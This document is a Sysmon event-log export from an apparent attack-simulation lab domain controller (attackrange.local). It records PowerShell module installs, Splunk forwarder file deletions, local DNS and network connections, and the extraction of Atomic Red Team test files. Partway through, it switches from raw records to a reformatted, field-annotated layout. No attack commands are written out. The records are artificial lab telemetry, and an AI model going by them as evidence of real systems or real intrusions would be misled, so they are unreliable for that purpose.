21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net45\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\YamlDotNet.xmlMD5=1045C5CAD5567179C0C91E47C43689E5,SHA256=6C9A38C755046212D995C94D912F1CC27E35A44B0B555F813D4E4510387D2111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\YamlDotNet.dllMD5=533A81907AB3B514953EEDB33290A9C6,SHA256=17F96E364AF4A0450A7013C047F39D6B0DA9C41B6809EF6677A5E500BB87985A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\LICENSE-libyamlMD5=6015F088759B10E0BC2BF64898D4AE17,SHA256=D0D8B09800A45CD982E9568FC7669D9C1A4C330E275A821BBE24D54366D16FE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.169{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\lib\net35\LICENSEMD5=25C40CB4C538F431332DE58473C0427A,SHA256=501450819EE316F35A214E7CEC1C19E14E5126392D356069D7AFEC7E59699536,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x800000000000000024311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Load-Assemblies.ps12021-06-23 21:08:13.137 11241100x800000000000000024310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Tests\powershell-yaml.Tests.ps12021-06-23 21:08:13.137 11241100x800000000000000024309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\netstandard1.3\YamlDotNet.dll2021-06-23 21:08:13.137 11241100x800000000000000024308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net45\YamlDotNet.dll2021-06-23 21:08:13.137 11241100x800000000000000024307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net35\YamlDotNet.dll2021-06-23 21:08:13.137 23542300x800000000000000024341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:14.325{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1571A312D9EE201EA41C0CA3136C941F,SHA256=70595DDABE6DA0F3253D73C3E143E72EE632BA1AC94244A0B64661E4C36DFAFE,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000024340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.265{4DB9351A-A273-60D3-3C05-00000000CF01}6608psg-prod-eastus.azureedge.net0type: 5 psg-prod-eastus.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:15.341{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D89897C7E507FEABDB7A0CED3FFA6CA,SHA256=E9A6E5BF58B6E660AE0571660C0B8EE107EF6DE748A68B697D091BBB497A456B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:16.341{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6AA9EBCCD2B7E9E7D64BAF723C9E9EF,SHA256=1A5482CD44CDD237985B908D8D9C91724970F4B6F8B66F667484AE9479D1AC7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:17.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Sysmon records from the Microsoft-Windows-Sysmon/Operational channel on win-dc-663.attackrange.local, one record per line in the order of the export. Every record carries Level=4, Opcode=0, Keywords=0x8000000000000000 and a Task equal to its EventID; Version is 5 for EventID 3 and 23 and 2 for EventID 11 and 13. Field order per event type:
  EventID 23 (FileDelete):            EventRecordID | EventID | RuleName | UtcTime | ProcessGuid | ProcessId | User | Image | TargetFilename | Hashes | IsExecutable | Archived
  EventID 3 (NetworkConnect):         EventRecordID | EventID | RuleName | UtcTime | ProcessGuid | ProcessId | Image | User | Protocol | Initiated | SourceIsIpv6 | SourceIp | SourceHostname | SourcePort | SourcePortName | DestinationIsIpv6 | DestinationIp | DestinationHostname | DestinationPort | DestinationPortName
  EventID 11 (FileCreate):            EventRecordID | EventID | RuleName | UtcTime | ProcessGuid | ProcessId | Image | TargetFilename | CreationUtcTime
  EventID 13 (RegistryEvent SetValue): EventRecordID | EventID | RuleName | EventType | UtcTime | ProcessGuid | ProcessId | Image | TargetObject | Details

(tail of the EventID 23 record begun in the preceding section) TargetFilename continues: Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=2C59CDC27FE4D7E3C128E9E6CBD03790,SHA256=0E4284A788187EBA998689ADF16300E49FEB471147B2933039B4FFA6479A5901,IMPHASH=00000000000000000000000000000000 | false | true
24345 | 23 | - | 2021-06-23 21:08:18.372 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=5CC92465D3203767C9251D061E3036C1,SHA256=525DB5E5B8E3E5DDF950CDAEA90E9355DA8B12425664AD0E380C3CC21B440C34,IMPHASH=00000000000000000000000000000000 | false | true
24347 | 23 | - | 2021-06-23 21:08:19.372 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=84FBAD5976C889902BB130741D127EA0,SHA256=5AC3B3B7B7BC430CEE4704BEC6F46E9DA55A113F73810DE2E6B374311500A1A7,IMPHASH=00000000000000000000000000000000 | false | true
24346 | 3 | - | 2021-06-23 21:08:17.255 | {4DB9351A-9DF7-60D3-6D00-00000000CF01} | 3888 | C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe | NT AUTHORITY\SYSTEM | tcp | true | false | 10.0.1.14 | win-dc-663.attackrange.local | 61501 | - | false | 10.0.1.12 | - | 8000 | -
24348 | 23 | - | 2021-06-23 21:08:20.403 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=5A5530BA78093D390CDCBFA3857C1034,SHA256=E7FB1E9EC2E134CF895DB6D7CE01F2DB520051B502AFDFA62695427D7D1DCA50,IMPHASH=00000000000000000000000000000000 | false | true
24349 | 23 | - | 2021-06-23 21:08:21.403 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=8CFEEF9156345CE1C6D6A6963435EF80,SHA256=0A81F8618D8298071C3748D3E5BF004419EC4A9773D73B57640DA3D2D9FF713C,IMPHASH=00000000000000000000000000000000 | false | true
24350 | 23 | - | 2021-06-23 21:08:22.419 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=FBAD99B2DBD55A4DF09A0D33F450A7E6,SHA256=499ADB825EC2A938FFAB07868F069CD319183B8382E4185503046559E0FFB1F2,IMPHASH=00000000000000000000000000000000 | false | true
24351 | 23 | - | 2021-06-23 21:08:23.419 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=B9E49AAF034D5E51B2A62BABEAA8C31E,SHA256=D85AA69C0588A1C44C3875177067F1C7585D72D51ED449A5747E320717A83E68,IMPHASH=00000000000000000000000000000000 | false | true
24352 | 23 | - | 2021-06-23 21:08:24.419 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=2FF0B023970321F600EB0A61EE0A22BC,SHA256=5827094B2657DFB9A961B2105BC48A8E9BD76CA635C03D53384114006C23C382,IMPHASH=00000000000000000000000000000000 | false | true
24355 | 23 | - | 2021-06-23 21:08:25.903 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | ATTACKRANGE\Administrator | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | MD5=0BABC06065E0663F43862E92F5EAC65D,SHA256=E226D5FC1E92FA39DD187F879184052122AA9F9D9E1E1E072E497B1C85E5DFC9,IMPHASH=00000000000000000000000000000000 | false | true
24354 | 23 | - | 2021-06-23 21:08:25.434 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=4CD3158A8538227365E837E75DB3DB03,SHA256=3011E92A2112F967423C3658A3450CECD3B29DAE2C38C287301B6EDE316E2D31,IMPHASH=00000000000000000000000000000000 | false | true
24353 | 3 | - | 2021-06-23 21:08:23.207 | {4DB9351A-9DF7-60D3-6D00-00000000CF01} | 3888 | C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe | NT AUTHORITY\SYSTEM | tcp | true | false | 10.0.1.14 | win-dc-663.attackrange.local | 61502 | - | false | 10.0.1.12 | - | 8000 | -
24357 | 23 | - | 2021-06-23 21:08:26.450 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=7A1322DC9F8DF4745EC3CD9A77EED386,SHA256=48B780BE8AD9B638D9C097A7BCE24680A4F1F86CE115006116B9D1E7A0F2E260,IMPHASH=00000000000000000000000000000000 | false | true
24356 | 23 | - | 2021-06-23 21:08:26.184 | {4DB9351A-9DDD-60D3-1200-00000000CF01} | 416 | NT AUTHORITY\LOCAL SERVICE | C:\Windows\System32\svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat | MD5=29BDC02D33BCC215D9EA00B07FD37716,SHA256=1B690E9B8968F1AA546FE13E50A1991368D6851084E6C296A304F42B8DC693EB,IMPHASH=00000000000000000000000000000000 | false | true
24358 | 23 | - | 2021-06-23 21:08:27.466 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=EE66AD28AE3D31731DE1DE9C9B227439,SHA256=0B1F7A6EE6CC2A1E03213ACAEDCDFEB5135A5CC8384BFD109C681427F72162F3,IMPHASH=00000000000000000000000000000000 | false | true
24365 | 23 | - | 2021-06-23 21:08:28.497 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=9BA7C73458C798FFFF19CF597B802588,SHA256=F5C649FC544CD3BD1CD4CAFC8E016D7EA0698C10D1E7B7C92CA32506893F2F13,IMPHASH=00000000000000000000000000000000 | false | true
24364 | 3 | - | 2021-06-23 21:08:26.167 | {4DB9351A-9DEA-60D3-2D00-00000000CF01} | 2188 | C:\Windows\System32\dns.exe | NT AUTHORITY\SYSTEM | udp | false | false | 10.0.1.14 | win-dc-663.attackrange.local | 58817 | - | false | 10.0.1.14 | win-dc-663.attackrange.local | 53 | domain
24363 | 3 | - | 2021-06-23 21:08:26.167 | {4DB9351A-9DEA-60D3-2D00-00000000CF01} | 2188 | C:\Windows\System32\dns.exe | NT AUTHORITY\SYSTEM | udp | false | false | 10.0.1.14 | win-dc-663.attackrange.local | 53 | domain | false | 10.0.1.14 | win-dc-663.attackrange.local | 58817 | -
24362 | 3 | - | 2021-06-23 21:08:26.167 | {4DB9351A-9DEA-60D3-2D00-00000000CF01} | 2188 | C:\Windows\System32\dns.exe | NT AUTHORITY\SYSTEM | udp | true | true | a00:10e:0:0:c850:5d9d:380:ffff | - | 58817 | - | true | a00:10e:0:0:0:0:0:0 | win-dc-663.attackrange.local | 53 | domain
24361 | 3 | - | 2021-06-23 21:08:26.166 | {4DB9351A-9DEA-60D3-2D00-00000000CF01} | 2188 | C:\Windows\System32\dns.exe | NT AUTHORITY\SYSTEM | udp | false | true | 0:0:0:0:0:0:0:1 | win-dc-663.attackrange.local | 53 | domain | true | 0:0:0:0:0:0:0:1 | win-dc-663.attackrange.local | 59010 | -
24360 | 3 | - | 2021-06-23 21:08:26.165 | {4DB9351A-9DEA-60D3-2D00-00000000CF01} | 2188 | C:\Windows\System32\dns.exe | NT AUTHORITY\SYSTEM | udp | false | true | 0:0:0:0:0:0:0:1 | win-dc-663.attackrange.local | 53 | domain | true | 0:0:0:0:0:0:0:1 | win-dc-663.attackrange.local | 49275 | -
24359 | 3 | - | 2021-06-23 21:08:26.165 | {4DB9351A-9DEA-60D3-2D00-00000000CF01} | 2188 | C:\Windows\System32\dns.exe | NT AUTHORITY\SYSTEM | udp | true | true | 0:0:0:0:0:0:0:1 | win-dc-663.attackrange.local | 49275 | - | true | 0:0:0:0:0:0:0:1 | win-dc-663.attackrange.local | 53 | domain
24367 | 13 | - | SetValue | 2021-06-23 21:08:29.950 | {4DB9351A-9DDD-60D3-1100-00000000CF01} | 436 | C:\Windows\system32\svchost.exe | HKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTime | QWORD (0x01d76873-0xeabd0cf7)
24366 | 23 | - | 2021-06-23 21:08:29.497 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=EED2E0EDE00C6FE958DE0C91F3505ACE,SHA256=AEC4A2CBEE4F298EE49A1B19BE339A62736A8A4D335D9D142A38854DDE38999D,IMPHASH=00000000000000000000000000000000 | false | true
24368 | 23 | - | 2021-06-23 21:08:30.509 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=12E8012FBFDFE91A3BE506016D973A1E,SHA256=B55408068C3743DEFED95108642CDD1F54F9F41194564A862B817CCEB236F7EA,IMPHASH=00000000000000000000000000000000 | false | true
24370 | 23 | - | 2021-06-23 21:08:31.540 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=C74EE6061B6CA3321995B51AA1573898,SHA256=53BE9C516A25EE3492F43AF5B07B33A4EA07B1A0D0FF337254969954E1F84174,IMPHASH=00000000000000000000000000000000 | false | true
24369 | 3 | - | 2021-06-23 21:08:29.239 | {4DB9351A-9DF7-60D3-6D00-00000000CF01} | 3888 | C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe | NT AUTHORITY\SYSTEM | tcp | true | false | 10.0.1.14 | win-dc-663.attackrange.local | 61503 | - | false | 10.0.1.12 | - | 8000 | -
24371 | 23 | - | 2021-06-23 21:08:32.556 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=C54307507EA53B7846D6C4CA17350E57,SHA256=82BF0EBAFA27C8C0A6C43E3CF75B90A04E732AB7CAAD0E4D3A9CEFBB304C73A5,IMPHASH=00000000000000000000000000000000 | false | true
24372 | 23 | - | 2021-06-23 21:08:33.556 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=C6277DD9D72EEEC346234289473729DA,SHA256=CCC8E940B8CC7AC8ED528251E986433823C0DB1BD56B98493D26FC6C5B65E765,IMPHASH=00000000000000000000000000000000 | false | true
24373 | 23 | - | 2021-06-23 21:08:34.571 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=CB7519A5535C6E663900049BA1FBA6DB,SHA256=A49480E745C3E869529E4830E0172BA0959903619DF214A5CBAE808F816F334E,IMPHASH=00000000000000000000000000000000 | false | true
24374 | 23 | - | 2021-06-23 21:08:35.603 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=9FA32B2E604444C2E08A41BD3AB53CB4,SHA256=A85CF8F4BE9A52B4631D81849D1966CE74F3F839EA370AE6F3A936A6616A0163,IMPHASH=00000000000000000000000000000000 | false | true
24375 | 23 | - | 2021-06-23 21:08:36.603 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=DA673AF4CF207946AFD0CD75A5984965,SHA256=B4E5DCA84965F6F8A9C8624045B7BDA03E4F083A45A126AE3C0F332D87A5992D,IMPHASH=00000000000000000000000000000000 | false | true
24377 | 23 | - | 2021-06-23 21:08:37.618 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=9F066E6EDCBD996CD6B926EBAF919F7C,SHA256=12AD0874CD5186DACB3861A820EC175B16FB2BC0FDA17586B92A23BDC1E596BD,IMPHASH=00000000000000000000000000000000 | false | true
24376 | 3 | - | 2021-06-23 21:08:35.251 | {4DB9351A-9DF7-60D3-6D00-00000000CF01} | 3888 | C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe | NT AUTHORITY\SYSTEM | tcp | true | false | 10.0.1.14 | win-dc-663.attackrange.local | 61504 | - | false | 10.0.1.12 | - | 8000 | -
24378 | 23 | - | 2021-06-23 21:08:38.634 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=3863582D24AF94734D672B0A5B15D128,SHA256=8433B4573E40BD98CCCC7E52225344BCF3B8E718CE66C1BE3C418ED51D494027,IMPHASH=00000000000000000000000000000000 | false | true
24381 | 11 | - | 2021-06-23 21:08:39.665 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\LICENSE.txt | 2021-06-23 21:08:39.665
24380 | 23 | - | 2021-06-23 21:08:39.649 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=A5A3AA6137AEADA349DECDBF5EFDEE86,SHA256=3F628FCB3117A2FCD199EEA6AD9857E65A83C37EE1F50977C0E71AEE1B1738CA,IMPHASH=00000000000000000000000000000000 | false | true
24379 | 23 | - | 2021-06-23 21:08:39.196 | {4DB9351A-9DEA-60D3-3000-00000000CF01} | 2404 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe | C:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml | MD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000 | false | true
24384 | 23 | - | 2021-06-23 21:08:40.869 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=1EB2FBE08A84C0D349B38AE962407D85,SHA256=5A6716945C183D5A10509A3877E25E8CE15F106988B1E6B91E0169E0DFE06AEC,IMPHASH=00000000000000000000000000000000 | false | true
24383 | 23 | - | 2021-06-23 21:08:40.869 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=07945BD3315BECE2495297A4CD4933C5,SHA256=3D95F7DFEE3C4AFB552289164D564BF2BDB161104F23CD0672ECBD5E009AF98A,IMPHASH=00000000000000000000000000000000 | false | true
24382 | 3 | - | 2021-06-23 21:08:39.235 | {4DB9351A-9DEA-60D3-3000-00000000CF01} | 2404 | C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe | NT AUTHORITY\SYSTEM | tcp | true | false | 10.0.1.14 | win-dc-663.attackrange.local | 61505 | - | false | 10.0.1.12 | - | 8089 | -
24391 | 23 | - | 2021-06-23 21:08:41.994 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational | MD5=DAA0179AB77A25930C93CEF345D95FDF,SHA256=8E3E9C9F942F75D18D78C7647C62620398E9D8527ACE2D6C809591178C5E4778,IMPHASH=00000000000000000000000000000000 | false | true
24390 | 23 | - | 2021-06-23 21:08:41.994 | {4DB9351A-9DFF-60D3-7600-00000000CF01} | 3068 | NT AUTHORITY\SYSTEM | C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe | C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational | MD5=3C9166925B7456EE7B3CD40B6E70EE37,SHA256=E5534DC2D2E565A9CE9B0D86936C24F08B9E55622FF32B0216BA6E5CE0EEF82B,IMPHASH=00000000000000000000000000000000 | false | true
24389 | 11 | - | 2021-06-23 21:08:41.931 | {4DB9351A-A273-60D3-3C05-00000000CF01} | 6608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1027\src\T1027-cc-macro.xlsm | 2021-06-23 21:08:41.931
